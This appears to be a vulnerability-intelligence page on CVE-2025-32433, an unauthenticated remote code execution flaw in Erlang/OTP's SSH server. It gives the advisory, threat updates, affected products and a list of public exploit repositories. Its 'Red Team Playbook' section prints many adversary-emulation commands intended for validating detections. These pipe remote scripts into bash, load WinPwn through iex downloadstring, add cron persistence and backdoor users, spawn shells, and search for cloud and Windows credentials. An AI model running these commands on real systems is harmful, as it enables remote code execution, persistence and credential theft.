CVE-2025-32433
Overview
This vulnerability is an authentication bypass in the SSH server component of Erlang/OTP caused by improper handling of SSH protocol messages. Specifically, the SSH server fails to correctly validate incoming protocol messages, allowing unauthenticated remote actors to manipulate message processing flow. The flaw resides in the SSH server implementation within the Erlang/OTP libraries prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, affecting the SSH protocol message parser and authentication logic.
Vulnerability Description
Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.
Impact
An unauthenticated attacker can remotely execute arbitrary commands on affected systems by exploiting the SSH server without any credentials or user interaction. This leads to full system compromise, enabling data exfiltration, installation of persistent malware, or lateral movement within a network. The vulnerability allows complete control over the target host through the compromised SSH service, posing critical threats to confidentiality, integrity, and availability of affected environments.
Solution
Upgrade Erlang/OTP to versions OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20 as specified in the official Erlang/OTP security advisory GHSA-37cp-fgq5-7wc2. Detailed patch instructions and source code fixes are available at the Erlang GitHub repository commits 0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12 and 6eef04130afc8b0ccb63c9a0d8650209cf54892f. As a temporary workaround, disable the SSH server or restrict access via firewall rules until patching is applied.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Erlang/OTP libraries, specifically within the SSH server implementation, presents a critical risk due to its potential for unauthenticated remote code execution (RCE). This flaw arises from improper handling of SSH protocol messages, allowing an attacker to bypass authentication mechanisms entirely. By exploiting this weakness, an adversary can execute arbitrary commands on the affected system without requiring valid credentials. The severity of this vulnerability is underscored by its perfect score on the Common Vulnerability Scoring System (CVSS), indicating that it poses an extreme threat to the confidentiality, integrity, and availability of the systems involved.
Attack vectors associated with this vulnerability are particularly concerning due to the ease with which they can be executed. An attacker could leverage this flaw remotely, requiring no physical access to the target system. The exploitation process may involve sending specially crafted SSH messages that the server mishandles, leading to the execution of unauthorized commands. Given the widespread use of Erlang/OTP in various applications, including telecommunications and distributed systems, the potential for exploitation is vast. Additionally, the presence of affected Cisco products further amplifies the risk, as these devices are often integral to enterprise networks and critical infrastructure.
The real-world impact of this vulnerability is substantial, with significant implications for business operations and data security. Organizations utilizing affected versions of Erlang/OTP or Cisco products may find themselves vulnerable to data breaches, system compromise, and service disruptions. The ability for an attacker to execute arbitrary code remotely means that they could manipulate or exfiltrate sensitive data, deploy malware, or even take control of critical systems. The financial repercussions of such incidents can be severe, including regulatory fines, loss of customer trust, and the costs associated with incident response and recovery efforts.
To effectively address this vulnerability, organizations must implement robust detection and mitigation strategies. Immediate steps should include upgrading to the patched versions of Erlang/OTP, which rectify the flaw in the SSH server. In scenarios where immediate upgrades are not feasible, temporary workarounds such as disabling the SSH server or restricting access through firewall rules should be employed to minimize exposure. Continuous monitoring for unusual activity on affected systems is also essential, as it can help detect potential exploitation attempts. Organizations should consider employing intrusion detection systems (IDS) and conducting regular security assessments to identify and remediate vulnerabilities proactively.
In conclusion, the vulnerability within the SSH server of Erlang/OTP represents a critical security threat that can lead to severe consequences for affected organizations. Given the ease of exploitation and the potential for significant business impact, it is imperative for organizations to prioritize the implementation of security patches and to adopt comprehensive security practices. By doing so, they can safeguard their systems against unauthorized access and ensure the integrity of their operations in an increasingly complex threat landscape.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-32433, coinciding with the emergence of new proof-of-concept exploit tools circulating on public repositories. This development indicates that threat actors are increasingly equipped to leverage the unauthenticated remote code execution vulnerability in Erlang/OTP SSH servers. Although the EPSS score has slightly decreased, our telemetry reveals a sharp upward trend in detection activity, suggesting growing adversary interest and operationalization of this flaw. The availability of multiple publicly accessible exploit implementations lowers the barrier for exploitation, broadening the potential attacker base beyond highly skilled actors. Consequently, the threat level associated with this vulnerability has intensified, elevating it from a theoretical risk to a more imminent and actionable threat for defenders monitoring Erlang/OTP deployments. This shift underscores the urgency for heightened vigilance in network monitoring and incident response readiness.
Update 2 — June 13, 2026
CSURFACE threat intelligence has identified a notable increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-32433, rising by approximately 17%, signaling an elevated likelihood of exploitation in the near term. This upward trend coincides with a marked reduction in detection activity across our sensors, which may indicate adversaries are refining their tactics to evade existing monitoring mechanisms. Concurrently, the exploit landscape has expanded with the emergence of several new proof-of-concept tools publicly available on GitHub, lowering the technical barrier for threat actors to leverage this critical pre-authentication remote code execution vulnerability. While ransomware usage remains unconfirmed, the combination of increased exploitability and stealthier attack patterns heightens the risk profile for organizations running Erlang/OTP SSH servers. This evolving environment necessitates that defenders recognize the shift from theoretical risk to a more imminent and actionable threat, as adversaries appear to be operationalizing the vulnerability with greater sophistication and persistence.
Update 3 — July 05, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2025-32433, accompanied by a growing number of publicly available proof-of-concept exploits on GitHub. This uptick in activity, while not yet rapid, signals a gradual operationalization of the vulnerability by threat actors. The expanded availability of technical resources lowers the barrier for less sophisticated adversaries to attempt remote code execution against vulnerable Erlang/OTP SSH servers. Although ransomware involvement remains unconfirmed, the persistence and diversification of exploit techniques suggest an evolving threat landscape that could facilitate broader attack campaigns. Consequently, the risk level for organizations running affected Erlang/OTP versions has shifted from theoretical to more imminent, warranting heightened vigilance as adversaries increasingly integrate this critical flaw into their toolsets.
Affected Products (34)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Erlang | Erlang\/otp | All |
cpe:2.3:a:erlang:erlang\/otp:*:*:*:*:*:*:*:*
|
|
|
Erlang | Erlang\/otp | All |
cpe:2.3:a:erlang:erlang\/otp:*:*:*:*:*:*:*:*
|
|
|
Erlang | Erlang\/otp | All |
cpe:2.3:a:erlang:erlang\/otp:*:*:*:*:*:*:*:*
|
|
|
Cisco | Confd Basic | All |
cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
|
|
|
Cisco | Confd Basic | All |
cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
|
|
|
Cisco | Confd Basic | All |
cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
|
|
|
Cisco | Confd Basic | All |
cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
|
|
|
Cisco | Confd Basic | All |
cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
|
|
|
Cisco | Network Services Orchestrator | All |
cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Network Services Orchestrator | All |
cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Network Services Orchestrator | All |
cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Network Services Orchestrator | All |
cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Network Services Orchestrator | All |
cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Network Services Orchestrator | All |
cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Cloud Native Broadband Network Gateway | All |
cpe:2.3:a:cisco:cloud_native_broadband_network_gateway:*:*:*:*:*:*:*:*
|
|
|
Cisco | Inode Manager | N/A |
cpe:2.3:a:cisco:inode_manager:-:*:*:*:*:*:*:*
|
|
|
Cisco | Smart Phy | All |
cpe:2.3:a:cisco:smart_phy:*:*:*:*:*:*:*:*
|
|
|
Cisco | Ultra Packet Core | All |
cpe:2.3:a:cisco:ultra_packet_core:*:*:*:*:*:*:*:*
|
|
|
Cisco | Ultra Services Platform | N/A |
cpe:2.3:a:cisco:ultra_services_platform:-:*:*:*:*:*:*:*
|
|
|
Cisco | Staros | All |
cpe:2.3:o:cisco:staros:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Erlang OTP Pre-Auth RCE Scanner and Exploit
exploits/linux/ssh/ssh_erlangotp_rce
|
Horizon3 Attack Team, Matt Keeley, Martin Kristiansen +1 | Unknown | - | View |
GitHub PoCs (41)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ProDefense/CVE-2025-32433
CVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2
|
ProDefense | 142 | 27 | 2025-04-18 | View |
|
omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC
The vulnerability allows an attacker with network access to an Erlang/OTP SSH server to execute arbitrary code without p...
|
omer-efe-curkus | 16 | 2 | 2025-04-18 | View |
|
NiteeshPujari/CVE-2025-32433-PoC
CVE-2025-32433 PoC: Unauthenticated Remote Code Execution (RCE) in Erlang/OTP SSH. A proof-of-concept exploit for CVE-20...
|
NiteeshPujari | 7 | 1 | 2025-08-13 | View |
|
ekomsSavior/POC_CVE-2025-32433
|
ekomsSavior | 5 | 2 | 2025-04-18 | View |
|
m0usem0use/erl_mouse
python script to find vulnerable targets of CVE-2025-32433
|
m0usem0use | 5 | 2 | 2025-04-18 | View |
|
0xPThree/cve-2025-32433
|
0xPThree | 6 | 1 | 2025-04-19 | View |
|
exa-offsec/ssh_erlangotp_rce
Exploitation module for CVE-2025-32433 (Erlang/OTP)
|
exa-offsec | 3 | 1 | 2025-04-18 | View |
|
darses/CVE-2025-32433
Security research on Erlang/OTP SSH CVE-2025-32433.
|
darses | 3 | 0 | 2025-04-18 | View |
|
LemieOne/CVE-2025-32433
Missing Authentication for Critical Function (CWE-306)-Exploit
|
LemieOne | 3 | 0 | 2025-04-18 | View |
|
0x7556/CVE-2025-32433
CVE-2025-32433 Erlang/OTP SSH RCE Exploit SSH远程代码执行漏洞EXP
|
0x7556 | 3 | 0 | 2025-04-25 | View |
|
AntonieSoga/Erlang-OTP-PoC_CVE-2025-32433
|
AntonieSoga | 2 | 1 | 2025-12-29 | View |
|
yonathanpy/CVE-2025-32433.py
CVE-2025-32433 PoC – SSH Protocol Python-based PoC for controlled lab testing of SSH message handling, channel operation...
|
yonathanpy | 2 | 1 | 2026-02-26 | View |
|
dollarboysushil/CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE
PoC showing unauthenticated remote code execution in Erlang/OTP SSH server. By exploiting a flaw in SSH protocol message...
|
dollarboysushil | 3 | 0 | 2025-09-07 | View |
|
Yuri08loveElaina/CVE-2025-32433-Erlang-OTP-SSH-Pre-Auth-RCE-exploit
Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and O...
|
Yuri08loveElaina | 2 | 1 | 2025-06-15 | View |
|
mirmeweu/cve-2025-32433
the task from C*****k
|
mirmeweu | 2 | 0 | 2025-09-24 | View |
|
joshuavanderpoll/cve-2025-32433
Go PoC for CVE-2025-32433 — unauthenticated RCE in Erlang/OTP SSH.
|
joshuavanderpoll | 2 | 0 | 2026-03-07 | View |
|
abrewer251/CVE-2025-32433_Erlang-OTP_PoC
This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems runnin...
|
abrewer251 | 0 | 2 | 2025-04-29 | View |
|
MrDreamReal/CVE-2025-32433
CVE-2025-32433 Summary and Attack Overview
|
MrDreamReal | 0 | 2 | 2025-04-27 | View |
|
teamtopkarl/CVE-2025-32433
Erlang/OTP SSH 远程代码执行漏洞
|
teamtopkarl | 1 | 0 | 2025-04-18 | View |
|
becrevex/CVE-2025-32433
Erlang OTP SSH NSE Discovery Script
|
becrevex | 1 | 0 | 2025-04-25 | View |
|
bilalz5-github/Erlang-OTP-SSH-CVE-2025-32433
CVE-2025-32433 – Erlang/OTP SSH vulnerability allowing pre-auth RCE
|
bilalz5-github | 1 | 0 | 2025-05-02 | View |
|
iteride/CVE-2025-32433
test
|
iteride | 1 | 0 | 2025-09-18 | View |
|
Know56/CVE-2025-32433
CVE-2025-32433 is a vuln of ssh
|
Know56 | 1 | 0 | 2025-04-28 | View |
|
dampedcoast/Exploiting-a-vulnerability-using-reverse-shell
This project simulates a real-world attack-and-defend scenario across two virtual machines. You will exploit a critical ...
|
dampedcoast | 0 | 0 | 2026-06-12 | View |
|
chuzouX/CVE-2025-32433-Exploit-edited
Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unic...
|
chuzouX | 0 | 0 | 2026-06-08 | View |
|
leehunkoo/hk_CVE-2025-32433
|
leehunkoo | 0 | 0 | 2026-06-03 | View |
|
l1nuxkid/CVE-2025-32433-exploit
|
l1nuxkid | 0 | 0 | 2025-11-08 | View |
|
0xBlackash/CVE-2025-32433
CVE-2025-32433
|
0xBlackash | 0 | 0 | 2026-04-09 | View |
|
C9b3rD3vi1/Erlang-OTP-SSH-CVE-2025-32433
Exploit Erlang/OTP SSH CVE-2025-32433 in a lab setup.
|
C9b3rD3vi1 | 0 | 0 | 2025-04-29 | View |
|
Epivalent/CVE-2025-32433-detection
|
Epivalent | 0 | 0 | 2025-04-18 | View |
|
meloppeitreet/CVE-2025-32433-Remote-Shell
Go-based exploit for CVE-2025-32433
|
meloppeitreet | 0 | 0 | 2025-04-19 | View |
|
ps-interactive/lab_CVE-2025-32433
CVE lab to accompany CVE course for CVE-2025-32433
|
ps-interactive | 0 | 0 | 2025-04-24 | View |
|
ODST-Forge/CVE-2025-32433_PoC
This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems runnin...
|
ODST-Forge | 0 | 0 | 2025-04-29 | View |
|
vigilante-1337/CVE-2025-32433
A critical flaw has been discovered in Erlang/OTP's SSH server allows unauthenticated attackers to gain remote code exec...
|
vigilante-1337 | 0 | 0 | 2025-05-03 | View |
|
te0rwx/CVE-2025-32433-Detection
|
te0rwx | 0 | 0 | 2025-08-27 | View |
|
soltanali0/CVE-2025-32433-Eploit
Erlang/OTP SSH Vulnerable to Pre-Authentication RCE
|
soltanali0 | 0 | 0 | 2025-11-27 | View |
|
agustfricke/erlang-ssh-rce-CVE-2025-32433
|
agustfricke | 0 | 0 | 2026-03-03 | View |
|
carlosalbertotuma/CVE-2025-32433
|
carlosalbertotuma | 0 | 0 | 2026-02-24 | View |
|
blackcat4347/CVE-2025-32433-available-for-windows
CVE-2025-32433-available-for-windows
|
blackcat4347 | 0 | 0 | 2026-02-02 | View |
|
Mdusmandasthaheer/CVE-2025-32433
|
Mdusmandasthaheer | 0 | 0 | 2025-08-28 | View |
|
giriaryan694-a11y/cve-2025-32433_rce_exploit
This exploit script is designed to simplify exploitation of the Erlang/OTP SSH vulnerability CVE-2025-32433 in the TryHa...
|
giriaryan694-a11y | 0 | 0 | 2025-12-25 | View |
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.